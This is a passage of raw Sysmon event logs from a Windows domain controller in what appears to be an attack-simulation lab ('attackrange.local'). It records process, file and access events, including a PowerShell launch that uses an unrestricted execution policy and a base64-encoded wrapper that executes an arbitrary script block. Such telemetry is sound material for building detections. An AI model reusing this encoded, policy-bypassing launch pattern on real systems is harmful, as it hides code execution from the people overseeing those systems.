10341000x80000000000000003405Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.784{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CAA-5FA1-A600-000000008801}2392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003404Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.784{D28789B6-7CAA-5FA1-A500-000000008801}25641328C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{D28789B6-7CAA-5FA1-A600-000000008801}2392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003403Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.791{D28789B6-7CAA-5FA1-A600-000000008801}2392C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES2EBC.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC6B406E0B4C4D472B8B9D8C8F7F2F19C5.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA9-5FA1-1A91-060000000000}0x6911a0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{D28789B6-7CAA-5FA1-A500-000000008801}2564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\ukrnp45s.cmdline" 10341000x80000000000000003402Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.690{D28789B6-7CA9-5FA1-A000-000000008801}46365092C:\Windows\system32\conhost.exe{D28789B6-7CAA-5FA1-A500-000000008801}2564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003401Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.690{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003400Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.690{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003399Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.690{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003398Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.690{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003397Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.690{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003396Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.690{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003395Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.690{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003394Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.690{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003393Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.690{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003392Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.690{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CAA-5FA1-A500-000000008801}2564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003391Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.690{D28789B6-7CAA-5FA1-A300-000000008801}13324500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CAA-5FA1-A500-000000008801}2564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF8DC9EB68F) 154100x80000000000000003390Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.697{D28789B6-7CAA-5FA1-A500-000000008801}2564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\ukrnp45s.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA9-5FA1-1A91-060000000000}0x6911a0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7CAA-5FA1-A300-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000003389Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.690{D28789B6-7CAA-5FA1-A300-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ukrnp45s.cmdline2020-11-03 15:52:10.690 11241100x80000000000000003388Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:10.690{D28789B6-7CAA-5FA1-A300-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ukrnp45s.dll2020-11-03 15:52:10.690 10341000x80000000000000003387Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.236{D28789B6-7CA9-5FA1-A000-000000008801}46365092C:\Windows\system32\conhost.exe{D28789B6-7CAA-5FA1-A400-000000008801}4456C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003386Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.236{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003385Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.236{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003384Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.236{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003383Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.236{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003382Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.236{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003381Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.236{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003380Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 